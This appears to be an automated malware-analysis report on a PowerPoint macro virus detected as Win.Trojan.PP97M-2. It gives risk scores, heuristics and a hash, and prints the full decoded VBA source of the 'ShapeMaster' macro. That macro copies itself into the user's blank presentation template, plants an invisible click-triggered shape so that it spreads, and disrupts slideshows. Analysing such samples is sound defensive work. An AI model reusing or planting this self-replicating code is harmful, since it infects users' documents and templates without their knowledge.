MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-2. The VBA macro attempts to achieve persistence by copying itself to the 'Blank Presentation.pot' template, potentially allowing it to run automatically when PowerPoint is opened. This persistence mechanism is a common tactic for malware.
Heuristics (2)
- ClamAV: Win.Trojan.PP97M-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.PP97M-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1772 bytes |

SHA-256: d2350e438f66e268c9f5415bf8ea41e6e9bd4bccbadcbea1471af53dd5acb7d3

Detection: ClamAV: Win.Trojan.PP97M-2

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ShapeMaster"
'<!--1nternal-->
'PPT.ShapeMaster v0.1 /1nternal
Sub actionhook(ShapeMaster)
    On Error Resume Next
    If Int(Rnd * 7) = 0 Then
        Set Home = ActivePresentation
        Prev = 1
        Do
            Last = Prev
            Prev = InStr(Last + 1, Application.Path, "\")
        Loop While Prev <> 0
        Set templa = Presentations.Open(Left(Application.Path, Last) + "Templates\Blank Presentation.pot", , , msoFalse)
        dontadd = False
        For Each ModComponent In templa.VBProject.VBComponents
            If ModComponent.Name = "ShapeMaster" Then dontadd = True
        Next
        If dontadd <> True Then
            Set NewMod = templa.VBProject.VBComponents.Add(1)
            NewMod.Name = "ShapeMaster"
            NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.CountOfLines)
            Set ShapetoWack = templa.SlideMaster.Shapes.AddShape(1, 0, 0, templa.PageSetup.SlideWidth, templa.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "ShapeMaster"
                .ZOrder (msoSendToBack)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(ppMouseClick).Action = ppActionRunMacro
                .ActionSettings(ppMouseClick).Run = "actionhook"
            End With
            templa.Save
        End If
        templa.Close
    End If
    If Int(Rnd * 10) = 0 Then
        ActivePresentation.SlideShowWindow.View.Previous
        If Int(Rnd * 5) = 0 Then MsgBox ("PPT.ShapeMaster v0.1 /1nternal")
    Else
        ActivePresentation.SlideShowWindow.View.Next
    End If
End Sub
```